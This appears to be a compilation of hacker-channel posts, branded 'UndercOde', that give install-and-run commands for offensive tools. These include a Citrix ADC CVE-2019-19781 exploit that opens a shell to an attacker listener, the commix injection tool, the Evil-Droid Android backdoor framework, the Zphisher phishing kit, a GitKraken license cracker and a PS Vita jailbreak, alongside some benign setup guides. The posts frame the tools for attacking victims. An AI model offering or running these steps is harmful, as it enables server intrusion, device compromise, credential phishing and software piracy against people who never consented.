▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller and Citrix Gateway detailed
fb.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

> The vulnerability has been assigned the following CVE number:

> CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution

> The vulnerability affects all supported product versions and all supported platforms:

1) Citrix ADC and Citrix Gateway version 13.0 all supported builds

2) Citrix ADC and NetScaler Gateway version 12.1 all supported builds

3) Citrix ADC and NetScaler Gateway version 12.0 all supported builds

4) Citrix ADC and NetScaler Gateway version 11.1 all supported builds

5) Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑cve-2019-19781 Bug
>This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

This tool used for exploite servers

1) git clone https://github.com/trustedsec/cve-2019-19781

2) cd cve-2019-19781

3) pip3 install -r requirements.txt

4) python citrixmash.py <attackerip_listener> <attacker_port>

🦑How it works ?

> This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

> Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

>Note that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
2020 updated :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/commixproject/commix.git commix

2) cd commix

3) python commix.py -h

🦑What is The Use ?

>Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool ,

>that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

> By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
>HexInject is a very versatile packet injector and sniffer,
that provide a command-line framework for raw network access.
fb.com/UndercOdeTestingCompany
It's designed to work together with others command-line utilities,
and for this reason it facilitates the creation of powerful shell scripts
capable of reading, intercepting and modifying network traffic in a transparent manner

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/ParrotSec/hexinject

2) cd hexinject

3) Type make to compile (install)

🦑Features :

1) hexinject:
The main sniffer and injector.

2) prettypacket:
Disassemble raw packets (received on its standard input) and print their field.
Can also print example packets (useful if you want to know the structure of an header).

3) hex2raw:
Convert hexstring (the textual format used by hexinject) to raw data,
and vice-versa.

4) packets.tcl:
Experimental packet forger, written in TCL.
It uses a simple packet representation format based on APD

🦑Tested On:

>Parrot

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top 2019-2020 injection tools agaible on gitlab & github
twitter.com/UndercOdeTc

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) SQLMap - Automatic SQL Injection And Database Takeover Tool

2) jSQL Injection - Java Tool For Automatic SQL Database Injection

3) BBQSQL - A Blind SQL Injection Exploitation Tool

4) NoSQLMap - Automated NoSQL Database Pwnage

5) Whitewidow - SQL Vulnerability Scanner

6) DSSS - Damn Small SQLi Scanner

7) explo - Human And Machine Readable Web Vulnerability Testing Format

8) Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting

9) Leviathan - Wide Range Mass Audit Toolkit

10) Blisqy - Exploit Time-based blind-SQL injection in HTTP-Headers (MySQL/MariaDB)

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Crack GitKraken 2019 tool
T.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/5cr1pt/GitCracken

2) cd GitCracken

3) then run :


> yarn install

4) yarn build

5) node dist/bin/gitcracken.js --help for more usage information

6)gitcracken patcher [options] [actions...]

🦑Examples :

> Auto patch installed GitKraken (maybe require sudo privileges on GNU/Linux)

1) gitcracken patcher
Use custom path to app.asar

2)?gitcracken patcher --asar ~/Downloads/gitkraken/resources/app.asar
Use custom actions (backup, unpack and patch)

3) gitcracken patcher backup unpack patch

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How install & Run any Yarn File :
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) open terminal & type

> curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add

4) Add the Yarn APT repository to your system's software repository list by typing:

> echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list

5) Once the repository is added to the system, update the package list, and install Yarn, with:

> sudo apt update

> sudo apt install yarn

6) If you already don't have Node.js installed on your system, the command above will install it.

7)!Those who are using nvm can skip the Node.js installation with:

> sudo apt install --no-install-recommends yarn

8) To verify that Yarn installed successfully, run the following commands which will print the Yarn version number:
yarn --version

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Trity Exploite Tool top 2019:Emulator Escape
>Trinity is the third public jailbreak for the PS Vita™, which supports the latest firmwares 3.69 and 3.70. The exploit chain consists of three stages: the MIPS Kernel Exploit, the PSP Emulator Escape and the ARM Kernel Exploit.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Download and install qcma and psvimgtools.
> https://codestation.github.io/qcma/
>https://github.com/yifanlu/psvimgtools/releases

2) Start qcma and within the qcma settings set the option Use this version for updates to FW 0.00 (Always up-to-date) to spoof the System Software check.

3) Launch Content Manager on your PS Vita and connect it to your computer, where you then need to select PS Vita System -> PC, and after that you select Applications. Finally select PSP™/Other and click on the game that you want to turn into the Trinity exploit. If you see an error message about System Software, you should simply reboot your device to solve it (if this doesn't solve, then put your device into airplane mode and reboot). If this does still not work, then alternatively set DNS to 212.47.229.76 to block updates.

4) Transfer the game over to your computer by clicking on Copy on your PS Vita. After copying, you go to the folder /Documents/PS Vita/PGAME/xxxxxxxxxxxxxxxx/YYYYZZZZZ on your computer, where xxxxxxxxxxxxxxxx is some string corresponding to your account ID and YYYYZZZZZ is the title id of the game that you've just copied over. You can look at the image at YYYYZZZZZ/sce_sys/icon0.png to verify that it is indeed your chosen game. Furthermore, the YYYYZZZZZ folder should contain these folders: game, license and sce_sys.

5) Before you attempt to modify the backup, you should make a copy of it. Just copy YYYYZZZZZ somewhere else, such that if you fail to follow the instructions, you can copy it back and retry.

6) Insert the xxxxxxxxxxxxxxxx string here. If the AID is valid, it will yield a key that you can now use to decrypt/re-encrypt your game.

7) Decrypt the game backup by executing the following command in your command line/terminal (make sure you're in the right working directory. On Windows you can open the terminal in the current working directory by typing in cmd in the path bar of the file explorer. Also, if you haven't installed psvimgtools yet, then just place them in the YYYYZZZZZ folder):

> psvimg-extract -K YOUR_KEY game/game.psvimg game_dec
If done correctly, you should see an output like this:

> creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
>creating file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
all done.

8) Download Trinity and copy the PBOOT.PBP file to game_dec/ux0_pspemu_temp_game_PSP_GAME_YYYYZZZZZ/PBOOT.PBP (the files EBOOT.PBP, __sce_ebootpbp and VITA_PATH.txt should exist in this folder). If PBOOT.PBP does already exist there, just overwrite it.
> https://github.com/TheOfficialFloW/Trinity/releases/download/v1.0/PBOOT.PBP

9) Now re-encrypt the backup similar to above by typing this in your command line/terminal:

> psvimg-create -n game -K YOUR_KEY game_dec game
If done correctly, you should see an output like this:

>adding files for ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/EBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/PBOOT.PBP (x bytes)...
packing file ux0:pspemu/temp/game/PSP/GAME/YYYYZZZZZ/__sce_ebootpbp (x bytes)...
created game/game.psvimg (size: x, content size: x)
created game/game.psvmd

10) Remove the game_dec folder (and PSVimg tools if copied here) and

11) select Refresh database in qcma settings.

12) Now you need to copy back the modified backup to your PS Vita: Launch Content Manager on your PS Vita and connect it to your computer (if it's already open, just go back to the first menu), where you then need to select PC -> PS Vita System, and after that you select Applications. Finally select PSP™/Other and click on the modified game.

Perform the copy operation and exit Content Manager.

13) In the livearea, the game should now have a different icon and should now be called Trinity (eventually you have to rebuild the database in recovery mode to make the bubble change its look). If not, please re-read the instructions more carefully and begin from fresh.

> Turn on Wi-Fi, then reboot your device and straightly launch Trinity. Do not do anything else, otherwise the exploit will be less reliable. It is very important that you do not have any running downloads in background.

15) Enjoy the exploitation process and wait until it launches the Construct. If the exploit fails, simply rerun Trinity.

16) Within the Construct, select Download VitaShell, then Install HENkaku and finally Exit.

Congratulations, your device is now able to run homebrews. It is highly suggested that you downgrade your device to either firmware 3.60 or 3.65/3.67/3.68 using modoru. On 3.60, you can use HENkaku and on 3.65/3.67/3.68 you can use h-encore. If you don't downgrade your device now, you may lose the ability to launch Trinity later and therefore not be able to hack your device anymore.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Best Cleaner for Linux /
BleachBit system cleaner for Windows and Linux
fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/bleachbit/bleachbit

2) make -C po local # build translations

3) python bleachbit.py
Then, review the preferences.

4) Then, select some options, and click Preview. Review the files, toggle options accordingly, and click Delete.

5) For information regarding the command line interface, run:

>python bleachbit.py --help

That! all
@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack any android the evil-droid :
t.me/UndercOdeTesting

🦑Requirements :

1 ) metasploit-framework

2 ) xterm

3 ) Zenity

4 ) Aapt

5 ) Apktool

6) Zipalign

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Download the tool from github

> git clone https://github.com/M4sc3r4n0/Evil-Droid.git

2) Set script execution permission

> cd Evil-Droid

> chmod +x evil-droid

3) Run Evil-Droid Framework :

> ./evil-droid

choose option

🦑Tested by UndercOde

> kali

>debian

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How design your termux Like Your Desktop Windows ?
T.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Open Termux and type :

pkg update && pkg upgrade && pkg install x11-repo && pkg install tigervnc openbox obconf xorg-xsetroot xcompmgr xterm polybar st zsh geany pcmanfm rofi feh neofetch htop vim elinks mutt git wget curl xfce4-settings

2) cd $HOME && git clone https://github.com/adi1090x/termux-desktop

3) Now go to the cloned directory termux-desktop and copy or move 'home' & 'usr' directories to /data/data/com.termux/files.

4) Now type:

>!cp -rf ./home /data/data/com.termux/files && cp -rf ./usr /data/data/com.termux/files
or

> mv -f ./home /data/data/com.termux/files && mv -f ./home /data/data/com.termux/files

5) Warning : I'm assuming you're doing this on a fresh termux install. If not so, please backup your files before running these command above. These commands will forcefully copy or move files in home & usr directory. So, before doing that, take a look inside the repo directories, and backup your existing config files (like .vimrc, .zshrc, .gitconfig, etc).


6) VNC Server Now, Let's configure the vnc server for graphical output. Run -
vncserver -localhost
At first time, you will be prompted for setting up passwords -
You will require a password to access your desktops.

7) Password:
Verify:

8) Would you like to enter a view-only password (y/n)? n
Note that passwords are not visible when you are typing them and maximal password length is 8 characters.
If everything is okay, you will see this message -

> New 'localhost:1 ()' desktop is localhost:1

9) Creating default startup script /data/data/com.termux/files/home/.vnc/xstartup
Creating default config /data/data/com.termux/files/home/.vnc/config

10) Starting applications specified in /data/data/com.termux/files/home/.vnc/xstartup

11) Log file is /data/data/com.termux/files/home/.vnc/localhost:1.log
It means that X (vnc) server is available on display 'localhost:1'.

12) Finally, to make programs do graphical output to the display 'localhost:1', set environment variable like shown here (yes, without specifying 'localhost'):
export DISPLAY=":1"

13) You may even put this variable to your bashrc or profile so you don't have to always set it manually unless display address will be changed.
Now You can start the vnc server by,
vncserver

14) And to stop the server, run -
vncserver -kill :1
VNC Client Now you need a vnc client app to connect to server. I'm using this Android VNC client: VNC Viewer (developed by RealVNC Limited). You can use TigerVNC if you're trying to connect to server by a computer (Windows or Linux).

15) Determine port number on which VNC server listens. It can be calculated like this: 5900 + {display number}. So for display 'localhost:1' the port will be 5901.

16) Now open the VNC Viewer application and create a new connection with the following information (assuming that VNC port is 5901) - EXAMPLE:
Address:
127.0.0.1:5901

Name:
Termux

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Termux tool Zphisher is an upgraded form of Shellphish.
Fb.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:


1) apt update

2) apt install git php openssh curl -y

3) git clone https://github.com/htr-tech/zphisher

4) cd zphisher

5) chmod +x zphisher.sh

6) bash zphisher.sh

🦑Or ; Use Single Command

> apt update && apt install git php curl openssh -y && git clone https://github.com/htr-tech/zphisher && cd zphisher && chmod +x zphisher.sh && bash zphisher.sh

🦑Features :


1) Latest Login Pages

2) New Instagram Auto Follower Page

3) All types of Erros Fixed


Written by UnderCode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁